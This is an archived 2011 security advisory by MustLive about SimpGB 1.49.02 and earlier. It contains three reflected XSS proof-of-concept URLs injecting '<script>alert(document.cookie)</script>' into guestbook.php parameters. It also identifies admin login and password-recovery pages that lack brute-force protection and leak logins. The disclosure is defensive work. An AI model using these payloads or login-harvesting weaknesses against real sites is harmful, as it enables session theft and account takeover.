SimpGB 1.49.02 Cross Site Scripting

SimpGB 1.49.02 Cross Site Scripting: Posted Jan 26, 2011; Authored by MustLive; SimpGB versions 1.49.02 and below suffer from cross site scripting, brute force, insufficient anti-automation, and abuse of functionality vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 9cb4976c249efe8db919a1b089f43b558fc4fcc89e16276cf184713fa3db6958; Download | Favorite | View

SimpGB 1.49.02 Cross Site Scripting

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If captcha is using in
guestbook, then working code of the captcha is required for the attack. Or
via GET request:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 285 files
Ubuntu 66 files
Debian 23 files
LiquidWorm 10 files
Valentin Lobstein 10 files
nu11secur1ty 7 files
Google Security Research 4 files
Milad Karimi 4 files
Jann Horn 3 files
Lennert Preuth 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,025)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,485)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,706)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

SimpGB 1.49.02 Cross Site Scripting

SimpGB 1.49.02 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SimpGB 1.49.02 Cross Site Scripting

Share This

SimpGB 1.49.02 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems